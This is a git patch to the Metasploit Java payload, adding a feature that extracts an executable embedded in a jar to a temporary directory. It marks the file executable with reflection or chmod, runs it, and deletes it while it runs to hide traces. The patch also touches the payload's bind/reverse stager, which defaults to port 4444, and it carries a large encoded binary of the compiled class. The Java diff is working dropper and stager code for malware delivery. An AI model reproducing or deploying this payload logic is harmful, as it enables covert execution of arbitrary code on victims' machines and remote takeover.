From 85640627ab9a06a05c3b5dfd9f0dd9b9e4336bf5 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 10 Nov 2010 19:54:56 +0000 Subject: [PATCH] add ability to drop an executable from the jar. see #406, thanks mihi git-svn-id: file:///home/svn/framework3/trunk@10973 4d416f70-5f16-0410-b530-b9f4589650da --- data/java/metasploit/Payload.class | Bin 7244 -> 8177 bytes .../javapayload/src/metasploit/Payload.java | 65 +++++++++++++++--- 2 files changed, 56 insertions(+), 9 deletions(-) diff --git a/data/java/metasploit/Payload.class b/data/java/metasploit/Payload.class index cf7661a2892b2a19ed23bfbda9a450fc5e7f6725..c1e8e9d384174116bbe7705ae68a2a585db92578 100644 GIT binary patch literal 8177 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 0) { // decrease count so that eventually the process // will stop spawning @@ -85,15 +101,8 @@ public class Payload extends ClassLoader { File classFile = new File(tempDir, clazzFile); classFile.getParentFile().mkdirs(); // load ourselves via the class loader (works both on disk and from Jar) - InputStream in = clazz.getResourceAsStream("/"+clazzFile); - FileOutputStream fos = new FileOutputStream(classFile); - byte[] buf = new byte[4096]; - int len; - while ((len = in.read(buf)) != -1) { - fos.write(buf,0,len); - } - fos.close(); - fos = new FileOutputStream(propFile); + writeEmbeddedFile(clazz, clazzFile, classFile); + FileOutputStream fos = new FileOutputStream(propFile); props.store(fos, ""); fos.close(); Process proc = Runtime.getRuntime().exec(new String[] { @@ -125,6 +134,33 @@ public class Payload extends ClassLoader { Thread.sleep(100); } } + } else if (droppedExecutable != null) { + File droppedFile = new File(droppedExecutable); + // File.setExecutable is Java 1.6+, therefore call it via reflection and try + // the chmod alternative if it fails. Do not call it at all for Windows. + if (!IS_DOS) { + try { + try { + File.class.getMethod("setExecutable", new Class[] {boolean.class}).invoke(droppedFile, new Object[] { Boolean.TRUE}); + } catch (NoSuchMethodException ex) { + // ok, no setExecutable method, call chmod and wait for it + Runtime.getRuntime().exec(new String[] {"chmod", "+x", droppedExecutable}).waitFor(); + } + } catch (Exception ex) { + // try to continue anyway, we have nothing to lose + ex.printStackTrace(); + } + } + + // now execute the executable. + // tempdir may contain spaces, so do not use the String variant of exec! + Runtime.getRuntime().exec(new String[] {droppedExecutable}); + + // Linux and other Unices allow removing files while they are in use + if (!IS_DOS) { + droppedFile.delete(); + droppedFile.getParentFile().delete(); + } } else { // check what stager to use (bind/reverse) int lPort = Integer.parseInt(props.getProperty("LPORT", "4444")); @@ -160,6 +196,17 @@ public class Payload extends ClassLoader { new Payload().bootstrap(in, out, props.getProperty("EmbeddedStage", null),stageParams); } } + + private static void writeEmbeddedFile(Class clazz, String resourceName, File targetFile) throws FileNotFoundException, IOException { + InputStream in = clazz.getResourceAsStream("/"+resourceName); + FileOutputStream fos = new FileOutputStream(targetFile); + byte[] buf = new byte[4096]; + int len; + while ((len = in.read(buf)) != -1) { + fos.write(buf,0,len); + } + fos.close(); + } private final void bootstrap(InputStream rawIn, OutputStream out, String embeddedStageName, String[] stageParameters) throws Exception { try {